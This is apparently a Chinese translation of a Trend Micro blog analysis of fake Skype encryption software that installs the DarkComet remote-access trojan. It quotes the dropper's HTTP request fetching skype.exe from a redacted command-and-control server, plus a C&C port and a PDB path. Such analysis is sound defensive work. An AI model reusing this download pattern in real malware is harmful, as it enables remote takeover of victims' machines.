假Skype加密軟體,偷渡DarkComet木馬程式

CNN的報導也顯示,有惡意軟體正透過Skype來散播,這讓我們想起另一起之前所發現會利用Skype的攻擊。

趨勢科技發現有個網頁宣稱會提供Skype的加密軟體。這個網頁被代管在敘利亞的{BLOCKED}encription.sytes.net,IP地址是{BLOCKED}.{BLOCKED}.{BLOCKED}.0.28。這是之前攻擊所用的同一台命令和控制(C&C)伺服器。該網頁有個內嵌YouTube影片,聲稱來自「IT Security Lab(安全實驗室)」,可以用來加密語音通訊。

假Skype加密軟體,偷渡DarkComet木馬程式

 

 

如果使用者被騙去下載檔案,就會出現一個宣稱會加密使用者Skype數據的程式。這個程式 – Skype Encription v2.1.exe,被趨勢科技偵測為BKDR_METEO.HVN。分析之後,我們沒有發現任何證據顯示這軟體有提供任何安全功能。

 

這個檔案包含了一組字串,顯示它是由「SyRiAnHaCkErS」所建立的:

C:\Users\SyRiAnHaCkErS\Desktop\test\final\final\obj\x86\Debug\Skype

Encription v 2.1.pdb

 

然後,這個軟體會送出一個連結:

 

GET /SkypeEncription/Download/skype.exe HTTP/1.1

Host: {BLOCKED}.{BLOCKED}.0.28

Connection: Keep-Alive

 

下載的skype.exe檔案被偵測為BKDR_ZAPCHAST.HVN,它其實是DarkComet版本3.3,會連到{BLOCKED}.{BLOCKED}.0.28端口771。在趨勢科技的測試環境裡重新導向流量,確認它確實是DarkComet。

 

假Skype加密軟體,偷渡DarkComet木馬程式

 

 

一旦安裝了BKDR_ZAPCHAST.HVN,攻擊者可以透過DarkComet遠端存取木馬(RAT)來對受感染系統取得完全的控制。關於DarkComet遠端存取木馬的功能已經在這裡這裡介紹過了。

請注意,Skype利用AES加密語音通訊和即時訊息,還包括視訊通話。

 

趨勢科技的使用者也不必擔心,他們可以透過主動式雲端截毒服務  Smart Protection Network偵測和刪除所有相關惡意軟體來防護這威脅。

歡迎免費下載試用趨勢科技PC-cillin 2012雲端版

 

@原文出處:Fake Skype Encryption Software Cloaks DarkComet Trojan作者:Natt Villeneuve(資深威脅研究員)

◎ 歡迎加入趨勢科技社群網站